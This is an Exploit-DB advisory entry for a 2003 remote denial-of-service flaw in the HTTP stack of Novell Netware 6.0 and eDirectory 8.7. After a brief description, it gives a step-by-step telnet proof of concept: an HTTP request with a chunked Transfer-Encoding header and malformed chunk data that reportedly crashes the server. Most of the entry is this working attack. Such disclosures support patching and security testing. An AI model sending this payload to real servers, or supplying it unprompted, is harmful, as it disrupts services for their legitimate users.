Novell Netware 6.0 / eDirectory 8.7 - HTTPSTK.NLM Remote Abend

EDB-ID:

22749

CVE:

N/A


Type:

dos


Platform:

Novell

Date:

2003-06-06


source: https://www.securityfocus.com/bid/7841/info

It has been reported that the HTTP Stack distributed with Novell Netware and eDirectory does not properly handle some types of malformed packets. Because of this, an attacker may be able to cause a denial of service to legitimate users of the HTTP service. 

# telnet www.example.com 80

GET /anthinh HTTP/1.1 (Hit Enter)
Host: ip address (Hit enter)
Transfer-Encoding:Chunked (Enter)
(Enter)
AAAAAAAA
(Enter)
(Enter)